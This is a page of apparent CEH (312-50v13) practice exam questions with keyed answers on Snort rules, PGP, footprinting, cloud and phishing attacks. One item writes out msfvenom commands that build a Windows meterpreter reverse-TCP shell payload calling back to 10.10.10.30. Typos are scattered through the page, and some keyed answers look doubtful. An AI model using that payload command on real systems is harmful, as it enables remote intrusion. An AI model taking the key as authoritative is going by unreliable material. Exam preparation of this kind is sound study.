312-50v13 Practice Test Questions

551 Questions


Topic 2 : Exam Pool B

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?


A. AndroidManifest.xml


B. APK.info


C. resources.asrc


D. classes.dex





A.
  AndroidManifest.xml

Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msG. "mountd access";)


A. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111


B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet


C. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet


D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111





D.
  An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?


A. Use his own public key to encrypt the message.


B. Use Marie's public key to encrypt the message.


C. Use his own private key to encrypt the message.


D. Use Marie's private key to encrypt the message.





B.
  Use Marie's public key to encrypt the message.

Clark, a professional hacker, was hired by an organization lo gather sensitive Information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whole footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?


A. AOL


B. ARIN


C. DuckDuckGo


D. Baidu





B.
  ARIN

The tools which receive event logs from servers, network equipment, and applications, and perform analysis and correlation on those logs, and can generate alarms for security relevant issues, are known as what?


A. network Sniffer


B. Vulnerability Scanner


C. Intrusion prevention Server


D. Security incident and event Monitoring





D.
  Security incident and event Monitoring

An organization is performing a vulnerability assessment tor mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?


A. Product-based solutions


B. Tree-based assessment


C. Service-based solutions


D. inference-based assessment





D.
  inference-based assessment

which of the following protocols can be used to secure an LDAP service against anonymous queries?


A. SSO


B. RADIUS


C. WPA


D. NTLM





D.
  NTLM

Widespread fraud ac Enron. WorldCom, and Tyco led to the creation of a law that was designed to improve the accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that provide financial services to some organizations and came into effect in 2002. This law is known by what acronym?


A. Fed RAMP


B. PCIDSS


C. SOX


D. HIPAA





C.
  SOX

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?


A. Cloud hopper attack


B. Cloud cryptojacking


C. Cloudborne attack


D. Man-in-the-cloud (MITC) attack





A.
  Cloud hopper attack

In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to this scam.
Which of the following statement is incorrect related to this attack?


A. Do not reply to email messages or popup ads asking for personal or financial information


B. Do not trust telephone numbers in e-mails or popup ads


C. Review credit card and bank account statements regularly


D. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks


E. Do not send credit card numbers, and personal or financial information via e-mail





D.
  Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?


A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c


B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c


C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe


D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe





C.
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

You are a penetration tester working to test the user awareness of the employees of the client xyz. You harvested two employees' emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?


A. Reconnaissance


B. Command and control


C. Weaponization


D. Exploitation





C.
  Weaponization


Page 14 out of 46 Pages
Previous